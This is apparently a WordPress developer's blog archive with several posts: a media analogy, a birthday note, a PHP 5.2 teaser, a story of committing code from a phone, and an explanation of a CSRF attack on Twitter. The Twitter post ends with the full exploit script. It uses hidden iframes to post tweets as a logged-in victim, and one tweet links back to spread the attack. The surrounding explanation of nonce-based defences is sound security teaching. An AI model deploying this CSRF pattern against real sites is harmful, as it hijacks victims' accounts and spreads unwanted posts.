Sports, WordPress, and new media

David Carr of The New York Times presented this analogy on the evolving state of media outlets. The sports analogy is awesome, but I particularly love how he uses WordPress metonymically to refer to new media publishing:

More and more, media outlets are becoming a federation of individual brands like Mr. Kurtz. Journalism is starting to look like sports, where a cast of role players serves as a platform and context for highly paid, high-impact players. And those who cross over, after years of pushing copy through the print apparatus, will experience the allure of knocking some copy into WordPress and sending it out into the world to fend for itself.

h/t Jeff Waugh, Laurie Oakes.

My first WordPress birthday

Seriously, does it get cooler than this?

Tweet from @wordpress: Happy Birthday, @nacin! Thank you for all you do for @wordpress and the community.

Normally I enjoy the dozens of Facebook wall posts I get on this date every year, many from friends I don’t hear from too often. But there’s something really special about the dozens of mostly random tweets and retweets 1 wishing me a happy birthday and thanking me for my hard work. It makes me feel proud of the work we do and the impact we have doing it.

I only got involved in the WordPress community late last year. A year ago, I could never have imagined where I am now. I love what I do as a core developer. It’s crazy. And it looks like WordPress loves me back, too. Thanks Jane for the tweet, and so many of you in the community for the birthday wishes! 🙂

If you want to pitch a little my way in support of my contributions to WordPress, I’ve added a donate page that includes a link to a newly minted but woefully incomplete Amazon wish list.

Jane only really thought about doing this recently, but there were two other birthdays in the last two weeks I would be remiss not to mention: good friends and fellow WordPress contributors Daryl Koopersmith and Dion Hulse. I’m now 22, Daryl is 21, Dion is 23, so we’ve got quite a bit ahead of us and I don’t think we’ll be going anywhere anytime soon.

Notes:

  1. And the new followers courtesy of the @wordpress account’s 77,000 followers! 🙂

On PHP, Redux

Earlier today, Aaron Jorbin showed me an interesting conversation on the Portland PHP mailing list about PHP 5.2 and WordPress. I’ve previously written about this subject around the time we announced we were moving the minimum requirements to PHP 5.2 in WordPress 3.2, but there were a lot of questions, concerns, and statements in this thread that deserved a reply, so I joined up to offer one.

I was really happy with how my response turned out. I think it very effectively laid our thoughts and strategies on the table. It was pretty long (I jokingly coined a new unit of measurement in the process) and I believe it was an informative read, so I wanted to re-post it here. I’ve quoted previous emails from the thread throughout my reply, which has been lightly edited — Continue reading On PHP, Redux

Mobile coding

Photo by Remo

I love my Droid X phone. I was a little nervous when I switched from my BlackBerry in July, due to the Droid’s shorter battery life (but giant screen!), largeness (but giant screen!), and lack of a physical keyboard (but giant screen!). Clearly, I feel the beautiful, giant screen makes up for this. Not to mention a second battery as a backup.

One thing that always seems to amaze me is how powerful these devices are becoming. I seamlessly transition between devices all day long, and it also allows me to carry my laptop less and leave my desk more without having that unsettling ‘untethered’ feeling.

With that, here’s a cool process story from a few weeks ago. Daniel Bachhuber sent me a message asking why HTML was being filtered on a WordPress import, even though he was disabling the filtering system. (Read his roundup.) I checked his code and it looked fine, so I was stumped and didn’t know what to tell him. Fast forward to that evening: I was in the Metro with Aaron Jorbin on the way to the monthly DC PHP meetup, and in mid-conversation (which was entirely unrelated) it suddenly dawned on me that I was pretty sure that on multisite, we enforced filtering on import even for super administrators. 1

I fired off a quick email with my suspicions. Moments later I opened my Android browser and was browsing the WordPress source (I have it bookmarked, of course), and found the line. Success.

It didn’t stop there. After the meetup, I joined John Bloch 2 and a few others at the bar around the corner. While there, I received a reply from Daniel, and he wasn’t exactly happy that the only way around this was a core hack. I agreed, so I sent a Skype message (again, still from the phone) to Ryan Boren asking about perhaps adding a filter. He liked the idea, so I opened a new browser tab 3 and created a Trac ticket.

Of course, I had to keep going. So I fired up my SSH client, navigated to a checked out Subversion repository on my server, updated to trunk, opened the right files in Vim, and made the changes. After a sanity check from John, I was able to then commit a filter. All from my phone, having not opened my laptop all evening. Fun times.

Development while on the go is something I’ve wanted to attempt for a while — if only just once. Clearly only so much testing can go into it, and it’s certainly not something that will become a habit. Nonetheless, it was a quirky and fun experience, and it’s a testament to how powerful these mini-computers have evolved.

Notes:

  1. This does make sense, considering that super admins are often running imports of untrusted content when setting up sites for users. The fact that it was impossible to disable, though, was kind of lame.
  2. John also posted a good roundup of the meetup here.
  3. I can’t even live without tabs on my phone. What did I do before tabbed browsing on the desktop?

CSRF attack strikes Twitter

I mean, who didn’t see this coming?

Twitter allows a URL to send a tweet. Many sites and retweet buttons and such rely on it. No POST, no nonce, nothing. Just a simple HTTP GET triggers a tweet. Clearly, someone was going to exploit this eventually.

Authentication is not the same as intention. It is not enough to determine that a user is allowed to do something; you also have to determine that they intended to do it. When intent is not established, and especially when the action can be triggered by a plain GET request, these kinds of exploits are child’s play, as you can see from the complete exploit code below. It’s called a cross-site request forgery, or CSRF (or XSRF).

How do you determine intention? You’ll want to stop accepting state-changing requests over GET, but by itself that does little: an attacker’s page can auto-submit a hidden form to POST just as easily as it can load an iframe. The next step would be to check the HTTP referrer, but that header is often absent or stripped by proxies and privacy settings, and it can be spoofed outside a browser, so it isn’t foolproof either. That leaves you needing something like a nonce check, like what we use in WordPress: a token tied to the logged-in user and the specific action, which an attacker’s page has no way to read or guess. For Twitter to secure the site from this CSRF vulnerability, they’ll be breaking a lot of embedded tools and buttons on many, many sites, so for now they’ve apparently disabled the share endpoint that was exploited.

For the WordPress developers out there, probably the best read out there is this post by Mark Jaquith, from four years ago. It still applies as if it was written yesterday. For the non-WordPress developers, it’s still a great read as it explains what’s really going on, how WordPress prevents it, and why intention is important (if that isn’t obvious enough).

Once again, Twitter users are victims, thanks to the lack of basic security practices.

Update: Check out TechCrunch’s coverage. They quote a certain commenter who explained the issue. 🙂

Here’s the exploit:

<script type="text/javascript">
// Two hidden iframes, each pointed at Twitter's share endpoint. The victim's browser
// attaches the Twitter session cookie to each GET, so both tweets post as the victim.
var el1 = document.createElement('iframe');
var el2 = document.createElement('iframe');
el1.style.visibility="hidden";
el2.style.visibility="hidden";
// The first tweet links back to the page the victim is on, so anyone who follows it
// lands on this same script.
el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;
el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats";
// Appending the iframes to the document is what fires the two requests.
document.getElementsByTagName("body")[0].appendChild(el1);
document.getElementsByTagName("body")[0].appendChild(el2);
</script>